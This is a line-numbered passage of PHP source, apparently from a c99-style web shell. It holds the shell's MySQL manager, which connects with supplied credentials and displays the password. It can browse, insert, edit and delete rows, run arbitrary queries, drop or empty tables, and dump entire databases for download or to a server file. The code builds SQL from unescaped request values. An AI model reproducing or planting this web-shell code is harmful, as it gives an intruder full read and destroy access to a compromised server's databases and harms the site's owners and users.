  1297. else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  1298. }
  1299. else
  1300. {
  1301. $sqlquicklaunch = array();
  1302. $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  1303. $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  1304. $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  1305. $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  1306. $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  1307. $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  1308. echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  1309. if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  1310. echo "</center>";
  1311. }
  1312. echo "</td></tr><tr>";
  1313. if (!$sql_sock) {?>
  1314. <td width="28%" height="100" valign="top"><center><font size="5"> i </font></center>
  1315. <li>If login is null, login is owner of process.<li>
  1316. If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table>
  1317. </td>
  1318. <?php }
  1319. else
  1320. {
  1321. //Start left panel
  1322. if (!empty($sql_db))
  1323. {
  1324. ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  1325. $result = mysql_list_tables($sql_db);
  1326. if (!$result) {echo mysql_smarterror();}
  1327. else
  1328. {
  1329. echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  1330. $c = 0;
  1331. while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  1332. if (!$c) {echo "No tables found in database.";}
  1333. }
  1334. }
  1335. else
  1336. {
  1337. ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  1338. $result = mysql_list_dbs($sql_sock);
  1339. if (!$result) {echo mysql_smarterror();}
  1340. else
  1341. {
  1342. ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  1343. $c = 0;
  1344. $dbs = "";
  1345. while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  1346. echo "<option value=\"\">Databases (".$c.")</option>";
  1347. echo $dbs;
  1348. }
  1349. ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  1350. }
  1351. //End left panel
  1352. echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  1353. //Start center panel
  1354. $diplay = TRUE;
  1355. if ($sql_db)
  1356. {
  1357. if (!is_numeric($c)) {$c = 0;}
  1358. if ($c == 0) {$c = "no";}
  1359. echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  1360. if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  1361. echo "</b></center>";
  1362. $acts = array("","dump");
  1363. if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1364. elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  1365. elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  1366. elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1367. elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1368. elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1369. elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1370. elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  1371. elseif ($sql_tbl_act == "insert")
  1372. {
  1373. if ($sql_tbl_insert_radio == 1)
  1374. {
  1375. $keys = "";
  1376. $akeys = array_keys($sql_tbl_insert);
  1377. foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  1378. if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  1379. $values = "";
  1380. $i = 0;
  1381. foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  1382. if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  1383. $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  1384. $sql_act = "query";
  1385. $sql_tbl_act = "browse";
  1386. }
  1387. elseif ($sql_tbl_insert_radio == 2)
  1388. {
  1389. $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  1390. $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  1391. $result = mysql_query($sql_query) or print(mysql_smarterror());
  1392. $result = mysql_fetch_array($result, MYSQL_ASSOC);
  1393. $sql_act = "query";
  1394. $sql_tbl_act = "browse";
  1395. }
  1396. }
  1397. if ($sql_act == "query")
  1398. {
  1399. echo "<hr size=\"1\" noshade>";
  1400. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1401. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1402. if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  1403. }
  1404. if (in_array($sql_act,$acts))
  1405. {
  1406. ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  1407. if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  1408. if ($sql_act == "newtbl")
  1409. {
  1410. echo "<b>";
  1411. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  1412. }
  1413. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1414. }
  1415. elseif ($sql_act == "dump")
  1416. {
  1417. if (empty($submit))
  1418. {
  1419. $diplay = FALSE;
  1420. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  1421. echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  1422. $v = join (";",$dmptbls);
  1423. echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  1424. if ($dump_file) {$tmp = $dump_file;}
  1425. else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  1426. echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  1427. echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  1428. echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  1429. echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  1430. echo "</form>";
  1431. }
  1432. else
  1433. {
  1434. $diplay = TRUE;
  1435. $set = array();
  1436. $set["sock"] = $sql_sock;
  1437. $set["db"] = $sql_db;
  1438. $dump_out = "download";
  1439. $set["print"] = 0;
  1440. $set["nl2br"] = 0;
  1441. $set[""] = 0;
  1442. $set["file"] = $dump_file;
  1443. $set["add_drop"] = TRUE;
  1444. $set["onlytabs"] = array();
  1445. if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  1446. $ret = mysql_dump($set);
  1447. if ($sql_dump_download)
  1448. {
  1449. @ob_clean();
  1450. header("Content-type: application/octet-stream");
  1451. header("Content-length: ".strlen($ret));
  1452. header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  1453. echo $ret;
  1454. exit;
  1455. }
  1456. elseif ($sql_dump_savetofile)
  1457. {
  1458. $fp = fopen($sql_dump_file,"w");
  1459. if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  1460. else
  1461. {
  1462. fwrite($fp,$ret);
  1463. fclose($fp);
  1464. echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  1465. }
  1466. }
  1467. else {echo "<b>Dump: nothing to do!</b>";}
  1468. }
  1469. }
  1470. if ($diplay)
  1471. {
  1472. if (!empty($sql_tbl))
  1473. {
  1474. if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  1475. $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  1476. $count_row = mysql_fetch_array($count);
  1477. mysql_free_result($count);
  1478. $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  1479. $tbl_struct_fields = array();
  1480. while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  1481. if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  1482. if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  1483. if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  1484. if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  1485. $perpage = $sql_tbl_le - $sql_tbl_ls;
  1486. if (!is_numeric($perpage)) {$perpage = 10;}
  1487. $numpages = $count_row[0]/$perpage;
  1488. $e = explode(" ",$sql_order);
  1489. if (count($e) == 2)
  1490. {
  1491. if ($e[0] == "d") {$asc_desc = "DESC";}
  1492. else {$asc_desc = "ASC";}
  1493. $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  1494. }
  1495. else {$v = "";}
  1496. $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  1497. $result = mysql_query($query) or print(mysql_smarterror());
  1498. echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  1499. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1500. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1501. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1502. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1503. if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
  1504. if ($sql_tbl_act == "insert")
  1505. {
  1506. if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  1507. if (!empty($sql_tbl_insert_radio))
  1508. {
  1509. }
  1510. else
  1511. {
  1512. echo "<br><br><b>Inserting row into table:</b><br>";
  1513. if (!empty($sql_tbl_insert_q))
  1514. {
  1515. $sql_query = "SELECT * FROM `".$sql_tbl."`";
  1516. $sql_query .= " WHERE".$sql_tbl_insert_q;
  1517. $sql_query .= " LIMIT 1;";
  1518. $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  1519. $values = mysql_fetch_assoc($result);
  1520. mysql_free_result($result);
  1521. }
  1522. else {$values = array();}
  1523. echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  1524. foreach ($tbl_struct_fields as $field)
  1525. {
  1526. $name = $field["Field"];
  1527. if (empty($sql_tbl_insert_q)) {$v = "";}
  1528. echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  1529. $i++;
  1530. }
  1531. echo "</table><br>";
  1532. echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  1533. if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  1534. echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  1535. }
  1536. }
  1537. if ($sql_tbl_act == "browse")
  1538. {
  1539. $sql_tbl_ls = abs($sql_tbl_ls);
  1540. $sql_tbl_le = abs($sql_tbl_le);
  1541. echo "<hr size=\"1\" noshade>";
  1542. echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
  1543. $b = 0;
  1544. for($i=0;$i<$numpages;$i++)
  1545. {
  1546. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  1547. echo $i;
  1548. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  1549. if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  1550. else {echo "&nbsp;";}
  1551. }
  1552. if ($i == 0) {echo "empty";}
  1553. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
  1554. echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1>";
  1555. echo "<tr>";
  1556. echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  1557. for ($i=0;$i<mysql_num_fields($result);$i++)
  1558. {
  1559. $v = mysql_field_name($result,$i);
  1560. if ($e[0] == "a") {$s = "d"; $m = "asc";}
  1561. else {$s = "a"; $m = "desc";}
  1562. echo "<td>";
  1563. if (empty($e[0])) {$e[0] = "a";}
  1564. if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
  1565. else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
  1566. echo "</td>";
  1567. }
  1568. echo "<td><font color=\"green\"><b>Action</b></font></td>";
  1569. echo "</tr>";
  1570. while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1571. {
  1572. echo "<tr>";
  1573. $w = "";
  1574. $i = 0;
  1575. foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  1576. if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  1577. echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  1578. $i = 0;
  1579. foreach ($row as $k=>$v)
  1580. {
  1581. $v = htmlspecialchars($v);
  1582. if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
  1583. echo "<td>".$v."</td>";
  1584. $i++;
  1585. }
  1586. echo "<td>";
  1587. echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
  1588. echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
  1589. echo "</td>";
  1590. echo "</tr>";
  1591. }
  1592. mysql_free_result($result);
  1593. echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1594. echo "<option value=\"\">With selected:</option>";
  1595. echo "<option value=\"deleterow\">Delete</option>";
  1596. echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1597. }
  1598. }
  1599. else
  1600. {
  1601. $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  1602. if (!$result) {echo mysql_smarterror();}
  1603. else
  1604. {
  1605. echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
  1606. $i = 0;
  1607. $tsize = $trows = 0;
  1608. while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1609. {
  1610. $tsize += $row["Data_length"];
  1611. $trows += $row["Rows"];
  1612. $size = view_size($row["Data_length"]);
  1613. echo "<tr>";
  1614. echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  1615. echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
  1616. echo "<td>".$row["Rows"]."</td>";
  1617. echo "<td>".$row["Type"]."</td>";
  1618. echo "<td>".$row["Create_time"]."</td>";
  1619. echo "<td>".$row["Update_time"]."</td>";
  1620. echo "<td>".$size."</td>";
  1621. echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
  1622. echo "</tr>";
  1623. $i++;
  1624. }
  1625. echo "<tr bgcolor=\"000000\">";
  1626. echo "<td><center><b>»</b></center></td>";
  1627. echo "<td><center><b>".$i." table(s)</b></center></td>";
  1628. echo "<td><b>".$trows."</b></td>";
  1629. echo "<td>".$row[1]."</td>";
  1630. echo "<td>".$row[10]."</td>";
  1631. echo "<td>".$row[11]."</td>";
  1632. echo "<td><b>".view_size($tsize)."</b></td>";
  1633. echo "<td></td>";
  1634. echo "</tr>";
  1635. echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1636. echo "<option value=\"\">With selected:</option>";
  1637. echo "<option value=\"tbldrop\">Drop</option>";
  1638. echo "<option value=\"tblempty\">Empty</option>";
  1639. echo "<option value=\"tbldump\">Dump</option>";
  1640. echo "<option value=\"tblcheck\">Check table</option>";
  1641. echo "<option value=\"tbloptimize\">Optimize table</option>";
  1642. echo "<option value=\"tblrepair\">Repair table</option>";
  1643. echo "<option value=\"tblanalyze\">Analyze table</option>";
  1644. echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1645. mysql_free_result($result);
  1646. }
  1647. }
  1648. }
  1649. }
  1650. }
  1651. else
  1652. {
  1653. $acts = array("","newdb","serverstatus","servervars","processes","getfile");
